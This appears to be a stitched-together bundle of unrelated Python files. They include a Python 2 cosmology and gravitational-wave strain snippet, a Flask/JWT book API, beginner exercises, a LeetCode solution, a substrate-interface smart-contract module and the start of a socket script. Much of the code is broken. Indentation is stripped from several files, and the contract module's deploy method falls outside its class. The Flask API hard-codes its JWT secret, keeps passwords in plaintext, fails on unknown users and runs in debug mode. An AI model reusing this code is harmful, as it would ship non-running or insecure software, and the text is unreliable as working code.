# NOTE: xrange is Python 2 only -- this script targets Python 2.
for zi in xrange(len(reds)):
    # comoving distance: integral of 1/E(z) for the (omm, omv) cosmology
    comdistvec[zi]=integrate.quad(lambda z: (omm*(1.+z)**3.+omv)**(-0.5),0,reds[zi])[0]*dist_const
    lumdistvec[zi]=(1.+reds[zi])*comdistvec[zi]
lumdisti=lumdistvec[abs(reds-redsi).argmin()] #Luminosity distance corresponding to the chosen redshift of the binary.
comdisti=comdistvec[abs(reds-redsi).argmin()] #Comoving distance corresponding to the chosen redshift of the binary.
#-----------------------------------------------------------------
#Create a vector of frequencies and strains.
fvec=np.arange(fmin, fmax, fbin)
phivec=phi(tcoal(mchi, fvec), phic, mchi, fvec)
#hvec=ht(Qang(), mchi, lumdisti, fvec, fmin, fmax, phivec)
#hvec=ht_spa(Qang(), mchi, lumdisti, fvec, phivec)
# amplitude with and without the finite-window correction, for comparison
hvec=ht_amp(Qang(), mchi, lumdisti, fvec, fmin, fmax)
hvec_spa=ht_spa_amp(Qang(), mchi, lumdisti, fvec)
py.ion()
py.loglog(fvec, hvec)
py.loglog(fvec, hvec_spa)
#py.show()
|
from flask import Flask,request,jsonify
import json
import sqlite3
from flask_jwt_extended import create_access_token
from flask_jwt_extended import get_jwt_identity
from flask_jwt_extended import jwt_required
from flask_jwt_extended import JWTManager
app = Flask(__name__)
# NOTE(review): JWT secret is hard-coded in source; load it from an
# environment variable or config file for any non-demo deployment.
app.config["JWT_SECRET_KEY"] = "maxmaxmaxsupermaxmaxmaxsupermaxmaxmaxsuperupermaxmaxmaxmax"
jwt = JWTManager(app)
def db_connection():
    """Open and return a connection to the books.sqlite database.

    Raises sqlite3.Error when the database cannot be opened.
    """
    try:
        conn = sqlite3.connect('books.sqlite')
        print("Connected")
        return conn
    except sqlite3.Error:
        # BUG FIX: the original printed "Failed" and then hit a NameError
        # returning the unbound `conn`; re-raise so callers see the real error.
        print("Failed")
        raise
@app.route("/login", methods=["POST"])
def login():
conn = db_connection()
cursor = conn.cursor()
request_username = request.json.get("username", None)
request_password = request.json.get("password", None)
cursor.execute("SELECT * FROM user WHERE username=?", (request_username,))
user = list(cursor.fetchone())
if user != [] and (user[1] != request_username or user[2] != request_password):
return jsonify({"msg": "Bad username or password"}), 401
access_token = create_access_token(identity=request_username)
return jsonify(access_token=access_token)
@app.route("/signup",methods=["POST"])
def signup():
conn = db_connection()
cursor = conn.cursor()
new_username = request.json.get("username", None)
new_password = request.json.get("password", None)
if new_username is not None and new_password is not None:
sql = """INSERT INTO user (username,password) VALUES (?,?)"""
cursor = cursor.execute(sql,(new_username,new_password))
conn.commit()
conn.close()
return "Sucess",201
return "Failed",401
@app.route("/books",methods=["GET","POST"])
@jwt_required()
def books():
conn = db_connection()
cursor = conn.cursor()
if request.method == "GET":
cursor = conn.execute("SELECT * FROM book")
books = [dict(id=row[0],author=row[1],title=row[2]) for row in cursor.fetchall()]
if books is not None:
return jsonify(books)
if request.method == "POST":
new_author = request.json.get("author", None)
new_title = request.json.get("title", None)
sql = """INSERT INTO book (author,title) VALUES (?,?)"""
cursor = cursor.execute(sql,(new_author,new_title))
conn.commit()
conn.close()
return "Sucess",201
@app.route("/book/<int:id>", methods=["GET", "PUT", "DELETE"])
@jwt_required()
def single_book(id):
conn = db_connection()
cursor = conn.cursor()
book = None
if request.method == "GET":
cursor.execute("SELECT id,author,title FROM book WHERE id=?", (id,))
row = cursor.fetchone()
dict = {"id":row[0],"author":row[1],"title":row[2]}
print(dict)
book = jsonify(dict)
if book is not None:
return book, 200
else:
return "Something wrong", 404
if request.method == "PUT":
sql = """UPDATE book
SET title=?,
author=?
WHERE id=? """
author = request.json.get("author", None)
title = request.json.get("title", None)
updated_book = {
"id": id,
"author": author,
"title": title
}
print(id)
conn.execute(sql, (title, author, id))
conn.commit()
return jsonify(updated_book)
if request.method == "DELETE":
sql = """ DELETE FROM book WHERE id=? """
conn.execute(sql, (id,))
conn.commit()
return "The book with id: {} has been deleted.".format(id), 200
@app.route("/protected", methods=["GET"])
@jwt_required()
def protected():
current_user = get_jwt_identity()
return jsonify(logged_in_as=current_user), 200
if __name__ == "__main__":
app.run(debug=True)
|
# Write a Python program to get the smallest number from a list
# def smallest(lisofnum):
# return min(lisofnum)
# listofnum = [1,2,3,4,5,6,7,8,9]
# output = smallest(listofnum)
# print(output)
print("-----------------------without inbuilt function -------------------------")
def smallestNum(listofNums):
for i in range(len(listofNums)-1):
if listofNums[i]>listofNums[i+1]:
listofNums[i] = listofNums[i+1]
else:
pass
def checkList(listoNums):
for i in range(len(listofNums)-1):
if listofNums[i]<listofNums[i+1]:
pass
else:
smallestNum(listofNums)
return listofNums[0]
listofNums = [7,4,2,-1,5,0]
smallestNum(listofNums)
output = checkList(listofNums)
print(output) |
# Python Substrate Interface Library
#
# Copyright 2018-2020 Stichting Polkascan (Polkascan Foundation).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from hashlib import blake2b
from typing import Optional
from .utils import version_tuple
from substrateinterface.exceptions import ExtrinsicFailedException, DeployContractFailedException, \
ContractReadFailedException, ContractMetadataParseException
from scalecodec.base import ScaleBytes, ScaleType
from scalecodec.types import GenericContractExecResult
from substrateinterface.base import SubstrateInterface, Keypair, ExtrinsicReceipt
__all__ = ['ContractExecutionReceipt', 'ContractMetadata', 'ContractCode', 'ContractInstance', 'ContractEvent']
class ContractMetadata:

    def __init__(self, metadata_dict: dict, substrate: SubstrateInterface):
        """
        Class using the generated metadata.json file to represent the metadata of a contract. The metadata_dict is
        parsed and the used types are extracted, composed and added to the type registry of the runtime

        Parameters
        ----------
        metadata_dict
        substrate
        """
        self.metadata_version = None  # detected version 0..4, set during parsing
        self.metadata_dict = metadata_dict
        self.substrate = substrate
        self.type_registry = {}  # legacy (v0) cache: type_id -> type string
        self.__type_offset = 0  # 1 for pre-0.7.0 metadata whose type ids are 1-based
        self.__parse_metadata()

    @classmethod
    def create_from_file(cls, metadata_file: str, substrate: SubstrateInterface) -> "ContractMetadata":
        """
        Create a new ContractMetadata object using the provided metadata_file, usually generated by the command
        "cargo +nightly contract generate-metadata" in an ink! project

        Parameters
        ----------
        metadata_file
        substrate

        Returns
        -------
        ContractMetadata
        """
        with open(os.path.abspath(metadata_file), 'r') as fp:
            metadata_string = fp.read()
        return cls(json.loads(metadata_string), substrate)

    def __getattr__(self, item):
        # Fall back to top-level keys of the raw metadata dict, so e.g.
        # `self.spec` works without defining explicit properties.
        if item in self.metadata_dict:
            return self.metadata_dict[item]
        else:
            raise AttributeError("'{}' object has no attribute '{}'".format(self.__class__.__name__, item))

    def __convert_to_latest_metadata(self):
        """Detect the metadata version (0..4) and normalise older layouts of
        metadata_dict in place to the latest structure."""
        # Determine version
        if 'metadataVersion' in self.metadata_dict:
            self.metadata_version = 0
        elif 'V1' in self.metadata_dict:
            self.metadata_version = 1
        elif 'V2' in self.metadata_dict:
            self.metadata_version = 2
        elif 'V3' in self.metadata_dict:
            self.metadata_version = 3
        elif 'version' in self.metadata_dict:
            self.metadata_version = int(self.metadata_dict['version'])

        if self.metadata_version is None or self.metadata_version > 4:
            raise ContractMetadataParseException("Unsupported metadata version")

        # V1..V3 nest spec/storage/types under a "V<n>" key: hoist them up
        if 1 <= self.metadata_version <= 3:
            version_key = f"V{self.metadata_version}"
            self.metadata_dict['spec'] = self.metadata_dict[version_key]['spec']
            self.metadata_dict['storage'] = self.metadata_dict[version_key]['storage']
            self.metadata_dict['types'] = self.metadata_dict[version_key]['types']
            del self.metadata_dict[version_key]

        # Version converters
        # V1 -> V2: name becomes label; no longer array
        if self.metadata_version <= 1:
            def replace_name_with_label(obj):
                if 'name' in obj:
                    if type(obj['name']) is list:
                        obj['label'] = '::'.join(obj.pop('name'))
                    else:
                        obj['label'] = obj.pop('name')
                return obj

            for section in ['constructors', 'events', 'messages']:
                for idx, c in enumerate(self.metadata_dict['spec'][section]):
                    self.metadata_dict['spec'][section][idx]['args'] = [
                        replace_name_with_label(a) for a in c['args']
                    ]
                    replace_name_with_label(c)

        # V2 -> V3: new payable flags for constructors: default to true
        if self.metadata_version <= 2:
            for idx, c in enumerate(self.metadata_dict['spec']['constructors']):
                c["payable"] = True

    def __parse_metadata(self):
        """Validate the (normalised) metadata and register its types with the
        runtime configuration of the connected substrate instance."""
        self.__convert_to_latest_metadata()

        # Check requirements
        if 'types' not in self.metadata_dict:
            raise ContractMetadataParseException("No 'types' directive present in metadata file")

        if 'spec' not in self.metadata_dict:
            raise ContractMetadataParseException("'spec' directive not present in metadata file")

        if 'constructors' not in self.metadata_dict['spec']:
            raise ContractMetadataParseException("No constructors present in metadata file")

        if 'messages' not in self.metadata_dict['spec']:
            raise ContractMetadataParseException("No messages present in metadata file")

        if 'source' not in self.metadata_dict:
            raise ContractMetadataParseException("'source' directive not present in metadata file")

        # check Metadata version
        if 'V0' in self.metadata_dict and version_tuple(self.metadata_dict['metadataVersion']) < (0, 7, 0):
            # Type indexes are 1-based before 0.7.0
            self.__type_offset = 1

        # Prefix makes the contract's type names unique per code hash
        self.type_string_prefix = f"ink::{self.metadata_dict['source']['hash']}"

        if self.metadata_version == 0:
            # Legacy path: walk and register every type eagerly
            for idx, metadata_type in enumerate(self.metadata_dict['types']):
                idx += self.__type_offset
                if idx not in self.type_registry:
                    self.type_registry[idx] = self.get_type_string_for_metadata_type(idx)
        else:
            # Modern path: let scale-info's PortableRegistry register the types
            self.substrate.init_runtime()
            portable_registry = self.substrate.runtime_config.create_scale_object('PortableRegistry')
            portable_registry.encode({"types": self.metadata_dict["types"]})
            self.substrate.runtime_config.update_from_scale_info_types(
                portable_registry['types'], prefix=self.type_string_prefix
            )

    def generate_constructor_data(self, name, args: dict = None) -> ScaleBytes:
        """
        Compose the data field used in the "Contracts.instantiate" call, finding the selectors and encoded the args
        of given constructor

        Parameters
        ----------
        name: label of the constructor, as it appears in the metadata
        args: constructor arguments as {'label': value}

        Returns
        -------
        ScaleBytes

        Raises ValueError when the constructor or a required argument is missing.
        """
        if not args:
            args = {}

        for constructor in self.metadata_dict['spec']['constructors']:
            if name == constructor['label']:
                # Selector bytes first, then each argument SCALE-encoded in order
                data = ScaleBytes(constructor['selector'])
                for arg in constructor['args']:
                    if arg['label'] not in args:
                        raise ValueError(f"Argument \"{arg['label']}\" is missing")
                    else:
                        data += self.substrate.encode_scale(
                            type_string=self.get_type_string_for_metadata_type(arg['type']['type']),
                            value=args[arg['label']]
                        )
                return data

        raise ValueError(f'Constructor "{name}" not found')

    def get_type_string_for_metadata_type(self, type_id: int) -> str:
        """
        Adds a type included in the metadata (represented by an index in the type list) to the type registry and
        produces a type string that can be used in the scope of the `RuntimeConfigurationObject`.

        Parameters
        ----------
        type_id: index of the type in the metadata types list (1-based for
            legacy v0 metadata, scale-info id otherwise)

        Returns
        -------
        str
        """
        if self.metadata_version >= 1:
            # Modern metadata: types were registered via PortableRegistry,
            # only the prefixed name has to be composed here
            if type_id > len(self.metadata_dict['types']):
                raise ValueError(f'type_id {type_id} not found in metadata')

            return f'{self.type_string_prefix}::{type_id}'

        if self.metadata_version == 0:
            # Legacy type parsing

            # Check if already processed
            if type_id in self.type_registry:
                return self.type_registry[type_id]

            if type_id > len(self.metadata_dict['types']):
                raise ValueError(f'type_id {type_id} not found in metadata')

            arg_type = self.metadata_dict['types'][type_id - 1]

            if 'path' in arg_type:

                # Option field
                if arg_type['path'] == ['Option']:
                    # Examine the fields in the 'Some' variant
                    options_fields = arg_type['def']['variant']['variants'][1]['fields']
                    if len(options_fields) == 1:
                        sub_type = self.get_type_string_for_metadata_type(options_fields[0]['type'])
                    else:
                        raise NotImplementedError('Tuples in Option field not yet supported')
                    return f"Option<{sub_type}>"

                # Predefined types defined in crate ink_env
                if arg_type['path'][0:2] == ['ink_env', 'types']:
                    if arg_type['path'][2] == 'Timestamp':
                        return 'Moment'
                    elif arg_type['path'][2] in ['AccountId', 'Hash', 'Balance', 'BlockNumber']:
                        return arg_type['path'][2]
                    else:
                        raise NotImplementedError(f"Unsupported ink_env type '{arg_type['path'][2]}'")

            # RUST primitives
            if 'primitive' in arg_type['def']:
                return arg_type['def']['primitive']

            elif 'array' in arg_type['def']:
                array_type = self.get_type_string_for_metadata_type(arg_type['def']['array']['type'])

                # Generate unique type string
                return f"[{array_type}; {arg_type['def']['array']['len']}]"

            elif 'variant' in arg_type['def']:
                # Create Enum
                type_definition = {
                  "type": "enum",
                  "type_mapping": []
                }

                for variant in arg_type['def']['variant']['variants']:

                    if 'fields' in variant:
                        if len(variant['fields']) > 1:
                            raise NotImplementedError('Tuples as field of enums not supported')

                        enum_value = self.get_type_string_for_metadata_type(variant['fields'][0]['type'])
                    else:
                        enum_value = 'Null'

                    type_definition['type_mapping'].append(
                        [variant['name'], enum_value]
                    )

                # Add to type registry
                self.substrate.runtime_config.update_type_registry_types(
                    {f'{self.type_string_prefix}::{type_id}': type_definition}
                )

                # Generate unique type string
                self.type_registry[type_id] = f'{self.type_string_prefix}::{type_id}'

                return f'{self.type_string_prefix}::{type_id}'

            elif 'composite' in arg_type['def']:
                # Create Struct
                type_definition = {
                    "type": "struct",
                    "type_mapping": []
                }

                for field in arg_type['def']['composite']['fields']:
                    type_definition['type_mapping'].append(
                        [field['name'], self.get_type_string_for_metadata_type(field['type'])]
                    )

                # Add to type registry
                self.substrate.runtime_config.update_type_registry_types(
                    {f'{self.type_string_prefix}::{type_id}': type_definition}
                )

                # Generate unique type string
                self.type_registry[type_id] = f'{self.type_string_prefix}::{type_id}'

                return f'{self.type_string_prefix}::{type_id}'

            elif 'tuple' in arg_type['def']:
                # Create tuple
                elements = [self.get_type_string_for_metadata_type(element) for element in arg_type['def']['tuple']]
                return f"({','.join(elements)})"

        raise NotImplementedError(f"Type '{arg_type}' not supported")

    def get_return_type_string_for_message(self, name) -> str:
        """Return the type string of the given message's return type,
        or 'Null' for messages without one.  Raises ValueError when the
        message is unknown."""
        for message in self.metadata_dict['spec']['messages']:
            if name == message['label']:
                if message['returnType'] is None:
                    return 'Null'
                else:
                    return self.get_type_string_for_metadata_type(message['returnType']['type'])
        raise ValueError(f'Message "{name}" not found')

    def generate_message_data(self, name, args: dict = None) -> ScaleBytes:
        """
        Compose the data field used in the "Contracts.call" call, finding the selector and encoded the args
        of provided message name

        Parameters
        ----------
        name: name of message in contract
        args: arguments required by message, in format: `{'name': value}`

        Returns
        -------
        ScaleBytes

        Raises ValueError when the message or a required argument is missing.
        """
        if not args:
            args = {}

        for message in self.metadata_dict['spec']['messages']:
            if name == message['label']:
                # Selector bytes first, then each argument SCALE-encoded in order
                data = ScaleBytes(message['selector'])
                for arg in message['args']:
                    if arg['label'] not in args:
                        raise ValueError(f"Argument \"{arg['label']}\" is missing")
                    else:
                        data += self.substrate.encode_scale(
                            type_string=self.get_type_string_for_metadata_type(arg['type']['type']),
                            value=args[arg['label']]
                        )
                return data

        raise ValueError(f'Message "{name}" not found')

    def get_event_data(self, event_id: int) -> dict:
        """
        Looks up the event data for given 0-based event_id

        Parameters
        ----------
        event_id

        Returns
        -------
        dict with the event's metadata (label, args, docs)
        """
        if event_id > len(self.metadata_dict['spec']['events']):
            raise ValueError(f'Event ID {event_id} not found')
        return self.metadata_dict['spec']['events'][event_id]
class ContractEvent(ScaleType):

    def __init__(self, *args, contract_metadata: ContractMetadata = None, **kwargs):
        """
        ScaleType class containing information about a specific Contract Event, it decodes the "data" field in
        the generic "Contracts.ContractExecution" event that is triggered after a successful "Contracts.call" call.
        """
        self.contract_metadata = contract_metadata
        self.event_id = None  # 0-based event index, set by process()
        self.name = None  # event label from the contract metadata
        self.docs = None  # docs from the contract metadata
        self.args = []  # arg specs, each augmented with a decoded 'value'
        super().__init__(*args, **kwargs)

    def process(self):
        # First byte of the data identifies which contract event was emitted
        self.event_id = self.process_type('u8').value

        event_data = self.contract_metadata.get_event_data(self.event_id)
        self.name = event_data['label']
        self.docs = event_data['docs']
        self.args = event_data['args']

        for arg in self.args:
            # Decode value of event arg with type_string registered in contract
            arg_type_string = self.contract_metadata.get_type_string_for_metadata_type(arg['type']['type'])
            arg['value'] = self.process_type(arg_type_string).value

        return {
            'name': self.name,
            'docs': self.docs,
            'args': self.args
        }

    def process_encode(self, value):
        # Contract events are decode-only; encoding is intentionally unsupported
        raise NotImplementedError()
class ContractExecutionReceipt(ExtrinsicReceipt):

    def __init__(self, *args, **kwargs):
        """
        Object extending the `ExtrinsicReceipt` containing more information about the result after submitting a
        "Contracts.call" extrinsic.

        Parameters
        ----------
        args
        kwargs: must include 'contract_metadata' (ContractMetadata), which is
            popped before delegating to ExtrinsicReceipt
        """
        self.__contract_events = None  # lazily decoded by contract_events property
        self.contract_metadata = kwargs.pop('contract_metadata')
        super(ContractExecutionReceipt, self).__init__(*args, **kwargs)

    @classmethod
    def create_from_extrinsic_receipt(cls, receipt: ExtrinsicReceipt,
                                      contract_metadata: ContractMetadata) -> "ContractExecutionReceipt":
        """
        Promotes a ExtrinsicReceipt object to a ContractExecutionReceipt. It uses the provided ContractMetadata to
        decode "ContractExecution" events

        Parameters
        ----------
        receipt
        contract_metadata

        Returns
        -------
        ContractExecutionReceipt
        """
        return cls(
            substrate=receipt.substrate,
            extrinsic_hash=receipt.extrinsic_hash,
            block_hash=receipt.block_hash,
            finalized=receipt.finalized,
            contract_metadata=contract_metadata
        )

    def process_events(self):
        """Extend the base event processing by decoding every
        Contracts.ContractEmitted event into a ContractEvent."""
        super().process_events()

        if self.triggered_events:

            self.__contract_events = []

            for event in self.triggered_events:
                # Runtimes with scale-info expose events as value dicts;
                # older runtimes expose typed attributes -- handle both.
                if self.substrate.implements_scaleinfo():
                    if event.value['module_id'] == 'Contracts' and event.value['event_id'] == 'ContractEmitted':
                        # Create contract event
                        contract_event_obj = ContractEvent(
                            data=ScaleBytes(event['event'][1][1]['data'].value_object),
                            runtime_config=self.substrate.runtime_config,
                            contract_metadata=self.contract_metadata
                        )

                        contract_event_obj.decode()

                        self.__contract_events.append(contract_event_obj)
                else:
                    if event.event_module.name == 'Contracts' and event.event.name == 'ContractEmitted':
                        # Create contract event
                        contract_event_obj = ContractEvent(
                            data=ScaleBytes(event.params[1]['value']),
                            runtime_config=self.substrate.runtime_config,
                            contract_metadata=self.contract_metadata
                        )

                        contract_event_obj.decode()

                        self.__contract_events.append(contract_event_obj)

    @property
    def contract_events(self):
        # Decode events on first access and cache the result
        if self.__contract_events is None:
            self.process_events()

        return self.__contract_events
class ContractCode:
    def __init__(self, code_hash: bytes = None, metadata: ContractMetadata = None, wasm_bytes: bytes = None,
                 substrate: SubstrateInterface = None):
        """
        Object representing the blueprint of the contract, combining either the code hash and metadata of a contract, or
        the WASM bytes and metadata

        Parameters
        ----------
        code_hash: code hash of an already uploaded contract WASM binary
        metadata
        wasm_bytes: WASM binary
        substrate
        """
        self.code_hash = code_hash
        self.metadata = metadata
        self.wasm_bytes = wasm_bytes
        self.substrate = substrate
    @classmethod
    def create_from_contract_files(cls, wasm_file: str, metadata_file: str,
                                   substrate: SubstrateInterface) -> "ContractCode":
        """
        Create a ContractCode providing paths for the WASM binary file and metadata JSON file generated by the
        ink! project

        Parameters
        ----------
        wasm_file
        metadata_file
        substrate

        Returns
        -------
        ContractCode
        """
        with open(os.path.abspath(wasm_file), 'rb') as fp:
            wasm_bytes = fp.read()
            # code hash as computed on-chain: blake2b-256 of the WASM blob
            code_hash = blake2b(wasm_bytes, digest_size=32).digest()

        metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)

        return cls(code_hash=code_hash, metadata=metadata, wasm_bytes=wasm_bytes, substrate=substrate)
    @classmethod
    def create_from_code_hash(cls, code_hash: bytes, metadata_file: str,
                              substrate: SubstrateInterface) -> "ContractCode":
        """
        Create a ContractCode providing an existing contract code hash and a path to the metadata JSON file

        Parameters
        ----------
        code_hash
        metadata_file
        substrate

        Returns
        -------
        ContractCode
        """
        metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)

        return cls(code_hash=code_hash, metadata=metadata, substrate=substrate)
    def upload_wasm(self, keypair: Keypair, storage_deposit_limit: int = None) -> ExtrinsicReceipt:
        """
        Creates and submits an "Contracts.upload_code" extrinsic containing the WASM binary

        Parameters
        ----------
        keypair: Keypair used to sign the extrinsic
        storage_deposit_limit: The maximum amount of balance that can be charged to pay for the storage consumed

        Returns
        -------
        ExtrinsicReceipt

        Raises ValueError when no WASM bytes are present and NotImplementedError
        when the runtime exposes neither upload_code nor put_code.
        """
        if not self.wasm_bytes:
            raise ValueError("No WASM bytes to upload")

        call_function = self.substrate.get_metadata_call_function('Contracts', 'upload_code')

        if not call_function:
            # Try to fall back on legacy `put_code`
            call_function = self.substrate.get_metadata_call_function('Contracts', 'put_code')

        if not call_function:
            raise NotImplementedError("Couldn't find method in Contracts pallet to upload the WASM binary")

        call = self.substrate.compose_call(
            call_module="Contracts",
            call_function=call_function.name,
            call_params={
                'code': '0x{}'.format(self.wasm_bytes.hex()),
                'storage_deposit_limit': storage_deposit_limit
            }
        )

        extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)

        # Blocks until the extrinsic is included in a block
        return self.substrate.submit_extrinsic(extrinsic, wait_for_inclusion=True)
def deploy(self, keypair: Keypair, constructor: str, args: dict = None, value: int = 0, gas_limit: dict = None,
           deployment_salt: str = None, upload_code: bool = False, storage_deposit_limit: int = None
           ) -> "ContractInstance":
    """
    Deploys a new instance of the contract after it has been uploaded on-chain, with provided constructor and
    constructor arguments
    Parameters
    ----------
    keypair
    constructor: name of the constructor to use, provided in the metadata
    args: arguments for the constructor
    value: Value sent to created contract address
    gas_limit: Gas limit as WeightV2 type. Will default to {'ref_time': 25990000000, 'proof_size': 11990383647911208550}.
    deployment_salt: optional string or hex-string that acts as a salt for this deployment
    upload_code: When True the WASM blob itself will be uploaded with the deploy, False if the WASM is already present on-chain
    storage_deposit_limit: The maximum amount of balance that can be charged to pay for the storage consumed.
    Returns
    -------
    ContractInstance
    Raises
    ------
    ValueError
        When ``upload_code`` is True but no WASM bytes are loaded on this object.
    ExtrinsicFailedException
        When the deploy extrinsic is included but fails on-chain.
    DeployContractFailedException
        When the extrinsic succeeds but no 'Instantiated' event can be found.
    """
    # Lookup constructor and SCALE-encode its selector plus arguments.
    data = self.metadata.generate_constructor_data(name=constructor, args=args)
    if gas_limit is None:
        gas_limit = {'ref_time': 25990000000, 'proof_size': 11990383647911208550}
    if upload_code is True:
        if not self.wasm_bytes:
            raise ValueError("No WASM bytes to upload")
        # Upload the code and instantiate the contract in a single call.
        call = self.substrate.compose_call(
            call_module='Contracts',
            call_function='instantiate_with_code',
            call_params={
                'value': value,
                'gas_limit': gas_limit,
                'storage_deposit_limit': storage_deposit_limit,
                'code': '0x{}'.format(self.wasm_bytes.hex()),
                'data': data.to_hex(),
                'salt': deployment_salt or ''
            }
        )
    else:
        # Code is already on-chain: instantiate by code hash only.
        call = self.substrate.compose_call(
            call_module='Contracts',
            call_function='instantiate',
            call_params={
                'value': value,
                'gas_limit': gas_limit,
                'storage_deposit_limit': storage_deposit_limit,
                'code_hash': f'0x{self.code_hash.hex()}',
                'data': data.to_hex(),
                'salt': deployment_salt or ''
            }
        )
    extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)
    result = self.substrate.submit_extrinsic(extrinsic, wait_for_inclusion=True)
    if not result.is_success:
        raise ExtrinsicFailedException(result.error_message)
    # Extract the new contract address from the 'Instantiated' event; the event
    # layout differs between scale-info-capable and legacy metadata runtimes.
    for event in result.triggered_events:
        if self.substrate.implements_scaleinfo():
            if event.value['event']['event_id'] == 'Instantiated':
                return ContractInstance(
                    contract_address=event.value['event']['attributes']['contract'],
                    metadata=self.metadata,
                    substrate=self.substrate
                )
        else:
            if event.event.name == 'Instantiated':
                # NOTE(review): assumes the address is the second event parameter -- confirm
                # against the runtime's legacy event definition.
                return ContractInstance(
                    contract_address=event.params[1]['value'],
                    metadata=self.metadata,
                    substrate=self.substrate
                )
    raise DeployContractFailedException()
class ContractInstance:
    # Represents a deployed contract at a specific on-chain address, bound to its metadata.
    def __init__(self, contract_address: str, metadata: ContractMetadata = None, substrate: SubstrateInterface = None):
        """
        Create a ContractInstance for a contract at ``contract_address``, optionally with its
        parsed metadata and a substrate connection.
        """
        self.substrate = substrate
        self.contract_address = contract_address
        self.metadata = metadata
    @classmethod
    def create_from_address(cls, contract_address: str, metadata_file: str,
                            substrate: SubstrateInterface = None) -> "ContractInstance":
        """
        Create a ContractInstance object that already exists on-chain providing a SS58-address and the path to the
        metadata JSON of that contract
        Parameters
        ----------
        contract_address: SS58-address of contract
        metadata_file: path to metadata JSON generated for contract
        substrate
        Returns
        -------
        ContractInstance
        """
        metadata = ContractMetadata.create_from_file(metadata_file, substrate=substrate)
        return cls(contract_address=contract_address, metadata=metadata, substrate=substrate)
    def read(self, keypair: Keypair, method: str, args: dict = None,
             value: int = 0, gas_limit: Optional[dict] = None, block_hash: Optional[str] = None) -> GenericContractExecResult:
        """
        Used to execute non-mutable messages, for example to read data from the contract using getters. Can also be
        used to predict gas limits and 'dry-run' the execution when a mutable message is used.
        This method does not submit an extrinsic.
        Parameters
        ----------
        keypair
        method: name of message to execute
        args: arguments of message in {'name': value} format
        value: value to send when executing the message
        gas_limit: dict representation of `WeightV2` type
        block_hash: hash of the block to execute the message on
        Returns
        -------
        GenericContractExecResult
        """
        input_data = self.metadata.generate_message_data(name=method, args=args)
        # Execute runtime call in ContractsApi
        call_result = self.substrate.runtime_call("ContractsApi", "call", {
            'dest': self.contract_address,
            'gas_limit': gas_limit,
            'input_data': input_data.to_hex(),
            'origin': keypair.ss58_address,
            'value': value,
            'storage_deposit_limit': None
        }, block_hash)
        if 'Error' in call_result['result']:
            raise ContractReadFailedException(call_result.value['result']['Error'])
        if 'Ok' in call_result['result']:
            # Decode the raw SCALE return data into the message's declared return type,
            # replacing the opaque bytes in the result object in-place.
            try:
                return_type_string = self.metadata.get_return_type_string_for_message(method)
                result_scale_obj = self.substrate.create_scale_object(return_type_string)
                result_scale_obj.decode(ScaleBytes(call_result['result'][1]['data'].value_object))
                call_result.value_object['result'].value_object[1].value_object['data'] = result_scale_obj
                call_result.value['result']['Ok']['data'] = result_scale_obj.value
            except NotImplementedError:
                # Return type could not be resolved; leave the raw data untouched.
                pass
        return call_result
    def exec(self, keypair: Keypair, method: str, args: dict = None,
             value: int = 0, gas_limit: Optional[dict] = None, storage_deposit_limit: int = None,
             wait_for_inclusion: bool = True, wait_for_finalization: bool = False
             ) -> ContractExecutionReceipt:
        """
        Executes provided message by creating and submitting an extrinsic. To get a gas prediction or perform a
        'dry-run' of executing this message, see `ContractInstance.read`.
        Parameters
        ----------
        keypair
        method: name of message to execute
        args: arguments of message in {'name': value} format
        value: value to send when executing the message
        gas_limit: dict representation of `WeightV2` type. When omitted the gas limit will be calculated with a `read()`
        storage_deposit_limit: The maximum amount of balance that can be charged to pay for the storage consumed
        wait_for_inclusion: wait until extrinsic is included in a block (only works for websocket connections)
        wait_for_finalization: wait until extrinsic is finalized (only works for websocket connections)
        Returns
        -------
        ContractExecutionReceipt
        """
        if gas_limit is None:
            # Dry-run the message to estimate the gas required.
            # NOTE(review): assumes the read() result exposes `gas_required` -- confirm.
            gas_predit_result = self.read(keypair, method, args, value)
            gas_limit = gas_predit_result.gas_required
        input_data = self.metadata.generate_message_data(name=method, args=args)
        call = self.substrate.compose_call(
            call_module='Contracts',
            call_function='call',
            call_params={
                'dest': self.contract_address,
                'value': value,
                'gas_limit': gas_limit,
                'storage_deposit_limit': storage_deposit_limit,
                'data': input_data.to_hex()
            }
        )
        extrinsic = self.substrate.create_signed_extrinsic(call=call, keypair=keypair)
        receipt = self.substrate.submit_extrinsic(
            extrinsic, wait_for_inclusion=wait_for_inclusion, wait_for_finalization=wait_for_finalization
        )
        return ContractExecutionReceipt.create_from_extrinsic_receipt(receipt, self.metadata)
|
class Solution:
def checkStraightLine(self, coordinates: List[List[int]]) -> bool:
x1 = coordinates[0][0]
y1 = coordinates[0][1]
x2 = coordinates[-1][0]
y2 = coordinates[-1][1]
try:
if x2 == x1:
for i in range(1,len(coordinates)-1):
if coordinates[i][0] != x1:
return False
m = ((x2-x1)/(y2-y1))
for i in range(1,len(coordinates)-1):
p = ((m)*(coordinates[i][1]-y1)) - (coordinates[i][0] - x1)
if p != 0.0:
return False
break
return True
except:
return
|
class Customer:
    """A shop customer with a first name, last name and age."""
    # Class-level defaults; callers typically overwrite these per instance.
    fname = ""
    lname = ""
    age = 0
    def addCart(self):
        """Announce on stdout that a product was added to this customer's cart."""
        message = f"add product to {self.fname} {self.lname} {self.age}  's cart"
        print(message)
# Build four customers and add a product to each of their carts.
customer1 = Customer()
customer1.fname, customer1.lname, customer1.age = "Kosin", "Wangdee", 46
customer1.addCart()
customer2 = Customer()
customer2.fname, customer2.lname, customer2.age = "Kwanta", "Riewphaiboon", 45
customer2.addCart()
customer3 = Customer()
customer3.fname, customer3.lname, customer3.age = "Kiti", "Singhapat", 58
customer3.addCart()
customer4 = Customer()
customer4.fname, customer4.lname, customer4.age = "Thanachai", "Boonchum", 36
customer4.addCart()
|
import socket
import sys
import struct
import select
# If we are on the compucar the driver import will succeed; otherwise we
# enter a print-only debug mode (e.g. when developing on a desktop machine).
try:
    import driver
    DEBUG = False
except ImportError:
    DEBUG = True
# Listen address: "--local" binds loopback, otherwise the first CLI argument is used.
